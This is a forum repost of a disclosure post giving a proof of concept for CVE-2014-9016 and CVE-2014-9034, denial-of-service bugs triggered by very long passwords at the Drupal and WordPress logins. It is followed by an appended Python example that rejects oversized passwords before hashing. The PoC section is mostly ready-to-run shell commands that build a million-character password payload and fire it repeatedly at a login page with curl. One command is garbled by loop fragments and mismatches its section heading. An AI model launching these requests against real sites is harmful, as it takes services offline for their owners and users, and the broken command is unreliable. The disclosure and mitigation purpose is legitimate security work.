Nytro
Posted December 1, 2014

CVE-2014-9016 and CVE-2014-9034 Proof of Concept

Assuming that enough time has passed since the security update was released by Wordpress and Drupal, we want to share our research. As you already know, we believe in Responsible Disclosure and that is the reason why we didn't publish this post before.

[h=2]Drupal Denial of Service CVE-2014-9016[/h]

Generate a payload and try with a non-valid user:

$ echo -n "name=NO-VALID-USER&pass=" > no_valid_user_payload && printf "%s" {1..1000000} >> no_valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> no_valid_user_payload
$ time curl --data @no_valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &

Generate a payload and try with a valid user:

$ echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload
$ time curl --data @valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &); sleep 0.25; done

[h=2]Python Code[/h]

https://github.com/c0r3dump3d/wp_drupal_timing_attack

[h=2]References[/h]

Wordpress Denial of Service Responsible Disclosure - Attacking with long passwords ~ Hacking while you're asleep
Drupal Denial of Service Responsible Disclosure - Attacking with long passwords ~ Hacking while you're asleep
Timing Attack and the importance of controlling the length of the input – The Case of Drupal CVE-2014-9016. | # /dev/console
https://wordpress.org/news/2014/11/wordpress-4-0-1/
https://www.drupal.org/SA-CORE-2014-006
https://www.drupal.org/node/2378367
NVD - Detail: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9016

Source: CVE-2014-9016 and CVE-2014-9034 Proof of Concept ~ Hacking while you're asleep
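The mitigation pattern for this class of bug, as an added example that is not part of the original post and is not WordPress or Drupal code: refuse an over-long password before the stretching loop runs. The hash is a simplified phpass-style model; `stretch`, `hashed_bytes`, `LoginGuard`, the 4096-byte cap and the round count are all assumptions made for this sketch.

```python
import hashlib
import hmac

MAX_PASSWORD_BYTES = 4096   # assumed cap for this example, not taken from the page
LOG2_ROUNDS = 15            # assumed cost parameter for this example


def stretch(password: bytes, salt: bytes, log2_rounds: int = LOG2_ROUNDS) -> bytes:
    """Simplified phpass-style stretching: every round re-hashes the whole
    password, so CPU time grows with rounds * len(password)."""
    digest = hashlib.sha512(salt + password).digest()
    for _ in range(1 << log2_rounds):
        digest = hashlib.sha512(digest + password).digest()
    return digest


def hashed_bytes(password_len: int, salt_len: int = 8,
                 log2_rounds: int = LOG2_ROUNDS) -> int:
    """Bytes fed to SHA-512 by stretch() for one login attempt."""
    return (salt_len + password_len) + (1 << log2_rounds) * (64 + password_len)


class LoginGuard:
    """Hypothetical login check that refuses oversized input before hashing."""

    def __init__(self, max_bytes: int = MAX_PASSWORD_BYTES):
        self.max_bytes = max_bytes
        self.hash_calls = 0   # attempts that reached the expensive path

    def check(self, submitted: bytes, salt: bytes, stored: bytes) -> bool:
        if len(submitted) > self.max_bytes:
            return False      # cheap rejection, no hashing at all
        self.hash_calls += 1
        return hmac.compare_digest(stretch(submitted, salt), stored)


if __name__ == "__main__":
    salt = b"constructed-salt"                 # constructed sample values
    stored = stretch(b"correct horse", salt)
    guard = LoginGuard()
    print(guard.check(b"correct horse", salt, stored))
    print(guard.check(b"1" * 1_000_000, salt, stored), guard.hash_calls)
    print(hashed_bytes(1_000_000) // hashed_bytes(13))
```

The same cap is also worth enforcing as a request-body limit at the web server or reverse proxy, so an oversized login body is never parsed by the application.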